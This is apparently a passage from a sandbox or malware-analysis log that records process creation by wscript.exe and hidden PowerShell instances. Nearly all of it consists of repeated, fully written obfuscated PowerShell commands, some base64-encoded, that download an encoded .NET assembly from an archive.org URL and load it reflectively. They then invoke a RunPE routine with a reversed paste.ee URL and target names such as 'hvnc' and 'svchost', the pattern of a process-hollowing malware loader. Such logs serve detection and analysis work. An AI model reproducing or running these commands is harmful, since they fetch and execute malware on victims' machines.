2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\conhost.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
|
Source: C:\Windows\System32\wscript.exe |
